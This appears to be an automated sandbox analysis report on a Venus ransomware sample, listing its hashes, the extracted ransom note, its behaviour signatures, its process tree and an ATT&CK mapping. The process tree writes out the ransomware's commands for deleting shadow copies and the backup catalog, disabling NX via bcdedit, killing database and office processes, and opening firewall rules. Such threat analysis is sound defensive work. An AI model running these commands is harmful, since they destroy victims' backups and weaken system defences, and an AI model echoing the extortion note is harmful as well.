Overview

overview

10

Static

static

10

d74758f7cd...eb.exe

windows7-x64

10

d74758f7cd...eb.exe

windows10-1703-x64

10

d74758f7cd...eb.exe

windows10-2004-x64

10

d74758f7cd...eb.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    130s
  • max time network
    135s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    15-06-2024 11:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe

  • Size

    225KB

  • MD5

    67b1a741e020284593a05bc4b1a3d218

  • SHA1

    401e6815bbc62b092f96e93e9535f09d77aa4522

  • SHA256

    d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb

  • SHA512

    fc35cac1f925df0a516b4694658fc31a5fdb41ef8dee2a7d37d194e05ee06ec0f054494872f991ef90b46af7ee9ba0e2bd79a8c9109ca18d556f8b99be76067e

  • SSDEEP

    6144:w4bJmXqQwAhojkJZkYiV50DEruMxgTw7ozFD254W:w4NeqQwAhZb9DOGcopfW

Score
10/10
venusdefense_evasionevasionexecutionimpactpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\16002032821972527219.hta

Ransom Note
<<<Venus>>> We stole and encrypted your data, if you do not contact us within 48 hours we will sell your data on the dark net.Only we can decrypt your data.IMPORTANT! If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay. In this case we will not be able to help you. Do not play with files. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.-----------------------------------------------------Contact and send this file to us: email:[email protected]
Emails

Signatures

  • Venus

    Venus is a ransomware first seen in 2022.

    ransomwarevenus
  • Venus Ransomware 5 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
    ransomwareevasion
  • Renames multiple (8350) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 36 IoCs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 6 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of SetWindowsHookEx 21 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe
    "C:\Users\Admin\AppData\Local\Temp\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\Windows\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe
      "C:\Windows\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe" g g g o n e123
      2⤵
      • Executes dropped EXE
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3416
      • C:\Windows\System32\cmd.exe
        /C netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4516
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
          4⤵
          • Modifies Windows Firewall
          • Drops file in Windows directory
          PID:352
      • C:\Windows\System32\cmd.exe
        /C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1072
      • C:\Windows\System32\cmd.exe
        /C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:7156
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:7112
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:64
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {current} nx AlwaysOff
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:7152
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic SHADOWCOPY DELETE
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:6240
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\16002032821972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
          PID:2704
      • C:\Windows\System32\cmd.exe
        /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3160
        • C:\Windows\system32\PING.EXE
          ping localhost -n 3
          3⤵
          • Runs ping.exe
          PID:2496
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:6996
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\AssertJoin.hta
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:3660
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5080
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:6576
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:3280
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:6428
      • C:\Windows\SysWOW64\werfault.exe
        werfault.exe /h /shared Global\ebe01ee9df8146fca5cc760a7a0ac855 /t 6880 /p 2704
        1⤵
          PID:6824

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        Windows Management Instrumentation

        1
        T1047

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Defense Evasion

        Impair Defenses

        1
        T1562

        Disable or Modify System Firewall

        1
        T1562.004

        Indicator Removal

        3
        T1070

        File Deletion

        3
        T1070.004

        Modify Registry

        2
        T1112

        Credential Access

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Peripheral Device Discovery

        2
        T1120

        Query Registry

        4
        T1012

        Remote System Discovery

        1
        T1018

        System Information Discovery

        4
        T1082

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Exfiltration

        Impact

        Defacement

        1
        T1491

        Inhibit System Recovery

        4
        T1490

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml.venus
          Filesize

          3.3MB

          MD5

          93c9018a9cb7bcb9046d96a96fc3d30e

          SHA1

          230e373c6c3df170b986d787800e321e5471128c

          SHA256

          82d58fba77ef3667836591e1103290dad8765a08235df8af6f66461441daa20a

          SHA512

          1dbf0d037372f5bc1a75a5baf669d2b5f8cee7335f9311a67829faaba5d8cb5a6c02074a1a150917f2a4f40baeebaa138abf17955226fd8f431e7a3552100a2b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\16002032821972527219.hta
          Filesize

          1KB

          MD5

          cae840739bc07d89b2ba34b59364486b

          SHA1

          a44d6b28679482dd20159dcbf9fe3d634a10e267

          SHA256

          b6a3cb7f7622b28c8404d3a5a57e9b7c31681e9b7f07d5f3dea4d107923861a5

          SHA512

          ce2f0b67af259aa8be2f21777b112c57caa0650e0f3e207557ad45483122830391e2ea72528600ae810526342f6b434ab0f5707f6faf2694267dca0480526601

          Download Submit

        • C:\Windows\d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb.exe
          Filesize

          225KB

          MD5

          67b1a741e020284593a05bc4b1a3d218

          SHA1

          401e6815bbc62b092f96e93e9535f09d77aa4522

          SHA256

          d74758f7cd701f111f3d2188a639abc64ca7b8ffce508024d5cf510626cff9eb

          SHA512

          fc35cac1f925df0a516b4694658fc31a5fdb41ef8dee2a7d37d194e05ee06ec0f054494872f991ef90b46af7ee9ba0e2bd79a8c9109ca18d556f8b99be76067e

          Download Submit

        • \Device\HarddiskVolume1\$RECYCLE.BIN\S-1-5-21-1453213197-474736321-1741884505-1000\desktop.ini
          Filesize

          4KB

          MD5

          1c5d0a5da9b903810751decf30cd308f

          SHA1

          3e7054b0a6ab3d835388d0ad5cd1eef6d74cf228

          SHA256

          34b56b9e5fcecc8337c142a3bf455f123d2e610c659699cd5126e44763161714

          SHA512

          5469af14074d2cd69f73f8f4b035c485d086ecd04c418f0631f9f788edd0404c859d9f97df76e7a2674250ed5a16539e19ffe94d01b48236d0e02a81371368dd

          Download Submit

        • memory/1392-0-0x0000000000400000-0x000000000043E000-memory.dmp

          Filesize

          248KB

          Download

        • memory/1392-31-0x0000000000400000-0x000000000043E000-memory.dmp

          Filesize

          248KB

          Download

        • memory/3416-30-0x0000000000400000-0x000000000043E000-memory.dmp

          Filesize

          248KB

          Download

        • memory/3416-4500-0x0000000000400000-0x000000000043E000-memory.dmp

          Filesize

          248KB

          Download